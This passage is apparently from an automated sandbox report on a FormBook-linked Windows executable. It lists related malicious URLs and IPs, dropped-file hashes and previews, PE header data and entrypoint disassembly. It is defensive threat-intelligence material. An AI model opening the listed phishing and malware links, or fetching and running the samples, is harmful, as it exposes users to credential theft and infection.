                                                                  http://track.reviewmgr.com/ls/click?upn=u001.W5y-2Fhe84rCuLxXDO470nfuKD2Iz98QeQpE-2BkxRR0H-2BqB5cDKklujIJ5FLru7QrAASOSa17vR-2FSCLVAx4lWyy5Q-3D-3DNnGv_Yp4ydSxZWNatis3HtI6bBrJjg57JYwT6kbyY2f89Z-2FBhxNJZyCBl9w6yXNV0YfiKUAGjaILaAN0mF43Ydvv3aAXjCPBMrYvHXhqj-2F90M8IWSluK-2FDr0h4-2FIbAXpExZIWOjtRSKBCrpvm-2BHKZd6Q2itOPvvv8Wh8uHJq1rbQgzA92MMGG0eeFCZzQMnosAWydLTI7R4yQPl90fJpGVjewvRcCF77tY5-2B3PAHwq6SU-2Fc2kSK8E1mMumIEdp0dsw2BfptVK6-2FXO4Hh-2FAV8-2FJ5YFUs6qp3oyRx3LiWrBnDVYrVE-3DGet hashmaliciousUnknownBrowse
                                                                  • 141.193.213.20
                                                                  https://alessiabelltravel.comGet hashmaliciousUnknownBrowse
                                                                  • 141.193.213.11
                                                                  RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                  • 141.193.213.11
                                                                  PO No-5100002069 Sr. No. 11 & PO No-5100002072 Sr. No. 8,10,17..exeGet hashmaliciousFormBookBrowse
                                                                  • 141.193.213.10
                                                                  https://bitcoinwisdom.com/these-workers-found-a-giant-snake-you-wont-believe-what-they-found-inside/2/?utm_source=taboola&utm_term=yahoo-aol-mail&utm_medium=cpc&utm_campaign=Snake+US.D_snake&cost=0.13&tblci=GiAmoZnDSKA9Rcvf4CX7BxL2zvlH6pqfvE-XRuuUPfhj0iCA4Woo2fPniM_m2u-_ATDYl18Get hashmaliciousLiteHTTP BotBrowse
                                                                  • 141.193.213.20
                                                                  ByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                                  • 141.193.213.10
                                                                  https://krtra.com/t/onJtp2YcgmoQGet hashmaliciousUnknownBrowse
                                                                  • 141.193.213.11
                                                                  INVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                                                                  • 141.193.213.10
                                                                  TANDEMUSyakuza.sh.elfGet hashmaliciousMiraiBrowse
                                                                  • 15.210.62.195
                                                                  http://www2.megawebfind.comGet hashmaliciousUnknownBrowse
                                                                  • 15.197.204.56
                                                                  https://desertgarprodentalbdenmontessori.sharefile.com/public/share/web-sc0171e76f26940ab83813f90c639bcc9Get hashmaliciousUnknownBrowse
                                                                  • 15.197.239.217
                                                                  https://uxfol.io/p/b02d8c67/029f480aGet hashmaliciousUnknownBrowse
                                                                  • 15.197.129.158
                                                                  https://wetransfer.com/downloads/dfae2da4024c0a427ba385707deb5ffa20240620022822/9659fcGet hashmaliciousUnknownBrowse
                                                                  • 15.197.193.217
                                                                  0CkEHZjZgO.vbsGet hashmaliciousFormBookBrowse
                                                                  • 15.197.148.33
                                                                  https://certify-compte.fr/CETELGet hashmaliciousUnknownBrowse
                                                                  • 15.197.130.221
                                                                  uXK5hq53r7.exeGet hashmaliciousSimda StealerBrowse
                                                                  • 15.197.130.221
                                                                  2m7DLHWhxp.exeGet hashmaliciousSimda StealerBrowse
                                                                  • 15.197.130.221
                                                                  2w6qmU17rQ.exeGet hashmaliciousSimda StealerBrowse
                                                                  • 15.197.130.221
                                                                  AMAZON-02UShttps://www.payceconsultings.com/#choonghoon.kim@hyundaielevator.comGet hashmaliciousUnknownBrowse
                                                                  • 76.76.21.98
                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                  • 18.244.18.27
                                                                  xd.m68k.elfGet hashmaliciousMiraiBrowse
                                                                  • 18.175.16.182
                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 34.249.145.219
                                                                  xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                  • 44.234.6.132
                                                                  xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                  • 54.126.105.91
                                                                  x-8.6-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 54.171.230.55
                                                                  xd.arm.elfGet hashmaliciousMiraiBrowse
                                                                  • 18.183.46.95
                                                                  xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                                  • 18.217.199.161
                                                                  https://midlandtxconstruction.com/o/?c3Y9bzM2NV8xX29uZSZyYW5kPU5IRjVZVzA9JnVpZD1VU0VSMTcxMDIwMjRVMTgxMDE3MjE=N0123NGet hashmaliciousMamba2FABrowse
                                                                  • 13.35.58.91
                                                                  LINODE-APLinodeLLCUShttp://www2.megawebfind.comGet hashmaliciousUnknownBrowse
                                                                  • 45.56.79.23
                                                                  botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 192.155.85.209
                                                                  yakuza.i586.elfGet hashmaliciousUnknownBrowse
                                                                  • 212.71.233.232
                                                                  meerkat.sh4.elfGet hashmaliciousMiraiBrowse
                                                                  • 45.79.95.188
                                                                  http://jackelec.com.au/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 198.58.100.180
                                                                  Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • 173.255.194.134
                                                                  0CkEHZjZgO.vbsGet hashmaliciousFormBookBrowse
                                                                  • 45.33.6.223
                                                                  Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                  • 96.126.123.244
                                                                  UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                  • 45.79.19.196
                                                                  mNtu4X8ZyE.exeGet hashmaliciousEmotetBrowse
                                                                  • 45.33.77.42

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Users\user\AppData\Local\Temp\sqlite3.dllPO-0122-08-2024.xlsGet hashmaliciousFormBookBrowse
                                                                    PURCHASE ORDER.docGet hashmaliciousFormBookBrowse
                                                                      ENQUIRY OFFER.xlsGet hashmaliciousFormBookBrowse
                                                                        MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                                                          maildatas.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            5890796959.xlsGet hashmaliciousFormBookBrowse
                                                                              DlXCfRPdLr.rtfGet hashmaliciousFormBookBrowse
                                                                                NEW_ORDER.xlsGet hashmaliciousFormBookBrowse

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3290000[1].zip

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                  Category:dropped
                                                                                  Size (bytes):486020
                                                                                  Entropy (8bit):7.998960424234155
                                                                                  Encrypted:true
                                                                                  SSDEEP:12288:EKlJSZA7zQtl7IZyBgByo77WNMzTSZJVahsC:roZKzQtl7IZyqBy278pJVahsC
                                                                                  MD5:AF10A982A2EF91C9787106EEA1A0CC4A
                                                                                  SHA1:00435A36F5E6059287CDE2CEBB2882669CDBA3A5
                                                                                  SHA-256:E028068B067E5E60FA5680B0BAFA48A31287B6D614EE0B92DF51CCE23B974099
                                                                                  SHA-512:73D0D3034405527798B854DC33FC608C7CCF0AF1689E139AF4BBB5A5324DC0748BDC2BF632468745920DC7BE4EB7F0240D3CF1B5872D3F5C0C897725DB78BF9F
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:PK........-..NO..:4...........sqlite3.defUT....)&].)&]ux.................(...y.d....r.Tv.{sa,.....3==O....t.4.'.BHB.......?.....2.ms.....&.G.J.!<.;.`...g!..1..(.i)..Cl.W......fk.>.Q.2.4k;.......g..).o..<.....N...56i.8..gB.......q...A....U.].........S.......s$....=.p.@,-.:....o.E.ES.$...6V.Ha$.g.'q..h-5.....D1=G.M..*.Z...N.`......n.+..3$..|.P..".Y...iF.~.......V.`...BU.....G*.5.Nmj<...yx\=6E..f.@"l...Z<...w....o..J..g.. <.D..i?4.....j.....%^.../...O.t.F.......rw.v......{.O:....k.....PA{H!/..H..D....x..}z[".c .{9.5...&....v....b...n....G...H...X...H...-...9i.6...... .fV..I.....@@.r.S.z.n....:LIX..L.].YM..Z}.5V.|pF..a4...].?.30.L.,4.'.;y\R-.....u.;...j........y..>..\....jP.fT.]xEXs.3QV+z.'..mu.]hme3$....I.O.-...r...).......:..9x.F...8'c.."......a&.@..j.Vb..q.4...z.c.CV.&G.F.....K8h.d.........w.+..... .......nPT...(c..O..n@..<zVq..gu.al.L..P.<...e!&1..3..kg.....m*.Ug.@am.^..3.#.fU.a.!O:.W.....i...uK.]..p........)Go.v........0.._.`..I....<...._b..

                                                                                  C:\Users\user\AppData\Local\Temp\56Q8T4H

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                                  Category:dropped
                                                                                  Size (bytes):77824
                                                                                  Entropy (8bit):1.133993246026424
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                                  MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                                  SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                                  SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                                  SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\aut539C.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):287232
                                                                                  Entropy (8bit):7.992047985851314
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:GdDzYC4COjIWf/SUGNUt+LIKSORcyk1dsa6ZNfrqwr3zTfGdu96e:QDP4LIEfCU5vOCvlENzqwr3z9R
                                                                                  MD5:3E5F1BB0DCEC5893F58A9D0597078006
                                                                                  SHA1:A7B6E79A65390E57597B42410DF20BC3B39B39CF
                                                                                  SHA-256:D835267B284F86A01EB97BC66CE01E93F88CA1AF99465983B1D4068A191A9E6F
                                                                                  SHA-512:BF373B9D674DBE0E60FC650B822D536E879D75E33A82711B775C915B3DC5EE8264F1532143ED21DB70119DEB0FD430F2094236E28AB8F1F568623DC2D6900685
                                                                                  Malicious:false
                                                                                  Preview:..w..99JU...L....T:..{E1...GW2ST99JUSF9ENGGW2ST99JUSF9ENG.W2SZ&.DU.O.d.F....<PJj%!)^7/*g4S=:VMj76fK0 g.9...j.':7#.HCMcW2ST99J,RO.x. .jR4..Y-.I...t' .(....*2.\..{'0..=ZQw54.9ENGGW2S.|9J.RG9.}.'W2ST99JU.F;DEFLW2.P99JUSF9EN.TW2SD99J5WF9E.GGG2ST;9JSSF9ENGGQ2ST99JUS&=ENEGW2ST9;J..F9UNGWW2ST)9JESF9ENGWW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9k:"?#2ST=wNUSV9EN.CW2CT99JUSF9ENGGW2sT9YJUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUS

                                                                                  C:\Users\user\AppData\Local\Temp\demonetising

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):287232
                                                                                  Entropy (8bit):7.992047985851314
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:GdDzYC4COjIWf/SUGNUt+LIKSORcyk1dsa6ZNfrqwr3zTfGdu96e:QDP4LIEfCU5vOCvlENzqwr3z9R
                                                                                  MD5:3E5F1BB0DCEC5893F58A9D0597078006
                                                                                  SHA1:A7B6E79A65390E57597B42410DF20BC3B39B39CF
                                                                                  SHA-256:D835267B284F86A01EB97BC66CE01E93F88CA1AF99465983B1D4068A191A9E6F
                                                                                  SHA-512:BF373B9D674DBE0E60FC650B822D536E879D75E33A82711B775C915B3DC5EE8264F1532143ED21DB70119DEB0FD430F2094236E28AB8F1F568623DC2D6900685
                                                                                  Malicious:false
                                                                                  Preview:..w..99JU...L....T:..{E1...GW2ST99JUSF9ENGGW2ST99JUSF9ENG.W2SZ&.DU.O.d.F....<PJj%!)^7/*g4S=:VMj76fK0 g.9...j.':7#.HCMcW2ST99J,RO.x. .jR4..Y-.I...t' .(....*2.\..{'0..=ZQw54.9ENGGW2S.|9J.RG9.}.'W2ST99JU.F;DEFLW2.P99JUSF9EN.TW2SD99J5WF9E.GGG2ST;9JSSF9ENGGQ2ST99JUS&=ENEGW2ST9;J..F9UNGWW2ST)9JESF9ENGWW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9k:"?#2ST=wNUSV9EN.CW2CT99JUSF9ENGGW2sT9YJUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUSF9ENGGW2ST99JUS

                                                                                  C:\Users\user\AppData\Local\Temp\grw0i.zip

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                  Category:dropped
                                                                                  Size (bytes):486020
                                                                                  Entropy (8bit):7.998960424234155
                                                                                  Encrypted:true
                                                                                  SSDEEP:12288:EKlJSZA7zQtl7IZyBgByo77WNMzTSZJVahsC:roZKzQtl7IZyqBy278pJVahsC
                                                                                  MD5:AF10A982A2EF91C9787106EEA1A0CC4A
                                                                                  SHA1:00435A36F5E6059287CDE2CEBB2882669CDBA3A5
                                                                                  SHA-256:E028068B067E5E60FA5680B0BAFA48A31287B6D614EE0B92DF51CCE23B974099
                                                                                  SHA-512:73D0D3034405527798B854DC33FC608C7CCF0AF1689E139AF4BBB5A5324DC0748BDC2BF632468745920DC7BE4EB7F0240D3CF1B5872D3F5C0C897725DB78BF9F
                                                                                  Malicious:false
                                                                                  Preview:PK........-..NO..:4...........sqlite3.defUT....)&].)&]ux.................(...y.d....r.Tv.{sa,.....3==O....t.4.'.BHB.......?.....2.ms.....&.G.J.!<.;.`...g!..1..(.i)..Cl.W......fk.>.Q.2.4k;.......g..).o..<.....N...56i.8..gB.......q...A....U.].........S.......s$....=.p.@,-.:....o.E.ES.$...6V.Ha$.g.'q..h-5.....D1=G.M..*.Z...N.`......n.+..3$..|.P..".Y...iF.~.......V.`...BU.....G*.5.Nmj<...yx\=6E..f.@"l...Z<...w....o..J..g.. <.D..i?4.....j.....%^.../...O.t.F.......rw.v......{.O:....k.....PA{H!/..H..D....x..}z[".c .{9.5...&....v....b...n....G...H...X...H...-...9i.6...... .fV..I.....@@.r.S.z.n....:LIX..L.].YM..Z}.5V.|pF..a4...].?.30.L.,4.'.;y\R-.....u.;...j........y..>..\....jP.fT.]xEXs.3QV+z.'..mu.]hme3$....I.O.-...r...).......:..9x.F...8'c.."......a&.@..j.Vb..q.4...z.c.CV.&G.F.....K8h.d.........w.+..... .......nPT...(c..O..n@..<zVq..gu.al.L..P.<...e!&1..3..kg.....m*.Ug.@am.^..3.#.fU.a.!O:.W.....i...uK.]..p........)Go.v........0.._.`..I....<...._b..

                                                                                  C:\Users\user\AppData\Local\Temp\sqlite3.def

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):5583
                                                                                  Entropy (8bit):4.352170265556474
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:GcuN/gR+7Ogn0XRMcGM3KOGOF++hwIMtvQENw+Y0aR:E/Q+7Ogn0RKOBF++eHvQENw+cR
                                                                                  MD5:4F576602CE4286C96EBFE17A47332626
                                                                                  SHA1:289E71E45B3A4B10CB6E4B9A844EDEECDC09923A
                                                                                  SHA-256:A043CB55CFDBA9F4426C2006502BF2805B19CC9B0C81B09EAA76BDC9BD5F04CC
                                                                                  SHA-512:30B5771042F910EC53EBCB2396BE26DAFB0F2AB1D2FE886C2C1FCE2172D1F45ABB9EB417C24D0B87168690CD0E727F83D3CEC711787A44E095873D9975CF90C2
                                                                                  Malicious:false
                                                                                  Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_colum

                                                                                  C:\Users\user\AppData\Local\Temp\sqlite3.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):926331
                                                                                  Entropy (8bit):6.513562485953698
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:oI0H1fcKoDde/KBkI/njv7UU5vrVGFWG/Pi:obaRdeyBkI/jjUU5vJ8S
                                                                                  MD5:5E5BA61531D74E45B11CADB79E7394A1
                                                                                  SHA1:677224E14AAC9DD35F367D5EB1704B36E69356B8
                                                                                  SHA-256:99E91AE250C955BD403EC1A2321D6B11FCB715BDCC7CB3F63FFB46B349AFDE5C
                                                                                  SHA-512:712BFE419BA97ECF0EC8323A68743013E8C767DA9D986F74AB94D2A395C3086CAC2A5823048E0022D3BBCEBB55281B9E1F8C87FDC9295C70CC5521B57850BF46
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: PO-0122-08-2024.xls, Detection: malicious, Browse
                                                                                  • Filename: PURCHASE ORDER.doc, Detection: malicious, Browse
                                                                                  • Filename: ENQUIRY OFFER.xls, Detection: malicious, Browse
                                                                                  • Filename: MOQ010524Purchase order.doc, Detection: malicious, Browse
                                                                                  • Filename: maildatas.xls, Detection: malicious, Browse
                                                                                  • Filename: 5890796959.xls, Detection: malicious, Browse
                                                                                  • Filename: DlXCfRPdLr.rtf, Detection: malicious, Browse
                                                                                  • Filename: NEW_ORDER.xls, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)&].2..(......!.....v...&.....................a................................D......... .......................... ... ..H....P.......................`...3...........................@.......................!...............................text....t.......v..................`.P`.data...|............|..............@.`..rdata...#.......$..................@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H.... ......................@.0..CRT....,....0......................@.0..tls.... ....@......................@.0..rsrc........P......................@.0..reloc...3...`...4..................@.0B/4...................,..............@.@B/19.................0..............@..B/31..........P......................@..B/45..........p......................@..B/57.................................@.0B/70.....i...............

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.14781109770456
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:RN# D7521-RN-00353 REV-2.exe
                                                                                  File size:1'214'976 bytes
                                                                                  MD5:143f37f0dafe001d882dfcf2f15245a6
                                                                                  SHA1:43da59f78dd161230d8be6bc7710457e11eaae1e
                                                                                  SHA256:5b3e87b97fbd21afd93be09eaefa31a1582674848bacbb9e9746c2e26a10bf18
                                                                                  SHA512:995ae7f5ec586c4805cbc77d5e35ef80ca6b5de6299894b37ea9b26b65de9056d755f58476c7dbe718143df6c77a7a2fec55b4d5c122fbea71880526c300337e
                                                                                  SSDEEP:24576:Ytb20pkaCqT5TBWgNQ7aAkxk+c2xBNiJ4kken/a16A:hVg5tQ7aAkxkd2xBNilkenq5
                                                                                  TLSH:D145C01273DE8365C7725273BA25B701BEBF7C2506A1F56B2FD8093DE920122521EA73
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                                  File Icon

                                                                                  Icon Hash:aaf3e3e3938382a0

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x425f74
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6735E3FF [Thu Nov 14 11:50:23 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  call 00007FADD8B26F8Fh
                                                                                  jmp 00007FADD8B19FA4h
                                                                                  int3
                                                                                  int3
                                                                                  push edi
                                                                                  push esi
                                                                                  mov esi, dword ptr [esp+10h]
                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                  mov eax, ecx
                                                                                  mov edx, ecx
                                                                                  add eax, esi
                                                                                  cmp edi, esi
                                                                                  jbe 00007FADD8B1A12Ah
                                                                                  cmp edi, eax
                                                                                  jc 00007FADD8B1A48Eh
                                                                                  bt dword ptr [004C0158h], 01h
                                                                                  jnc 00007FADD8B1A129h
                                                                                  rep movsb
                                                                                  jmp 00007FADD8B1A43Ch
                                                                                  cmp ecx, 00000080h
                                                                                  jc 00007FADD8B1A2F4h
                                                                                  mov eax, edi
                                                                                  xor eax, esi
                                                                                  test eax, 0000000Fh
                                                                                  jne 00007FADD8B1A130h
                                                                                  bt dword ptr [004BA370h], 01h
                                                                                  jc 00007FADD8B1A600h
                                                                                  bt dword ptr [004C0158h], 00000000h
                                                                                  jnc 00007FADD8B1A2CDh
                                                                                  test edi, 00000003h
                                                                                  jne 00007FADD8B1A2DEh
                                                                                  test esi, 00000003h
                                                                                  jne 00007FADD8B1A2BDh
                                                                                  bt edi, 02h
                                                                                  jnc 00007FADD8B1A12Fh
                                                                                  mov eax, dword ptr [esi]
                                                                                  sub ecx, 04h
                                                                                  lea esi, dword ptr [esi+04h]
                                                                                  mov dword ptr [edi], eax
                                                                                  lea edi, dword ptr [edi+04h]
                                                                                  bt edi, 03h
                                                                                  jnc 00007FADD8B1A133h
                                                                                  movq xmm1, qword ptr [esi]
                                                                                  sub ecx, 08h
                                                                                  lea esi, dword ptr [esi+08h]
                                                                                  movq qword ptr [edi], xmm1
                                                                                  lea edi, dword ptr [edi+08h]
                                                                                  test esi, 00000007h
                                                                                  je 00007FADD8B1A185h
                                                                                  bt esi, 03h
                                                                                  jnc 00007FADD8B1A1D8h
                                                                                  movdqa xmm1, dqword ptr [esi+00h]

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [ASM] VS2012 UPD4 build 61030
                                                                                  • [RES] VS2012 UPD4 build 61030
                                                                                  • [LNK] VS2012 UPD4 build 61030

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5f900.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1240000x6c4c.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0xc40000x5f9000x5fa0026d238dcddd6041b8210cc0082c3adb6False0.9310253267973856data7.901741797672789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x1240000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

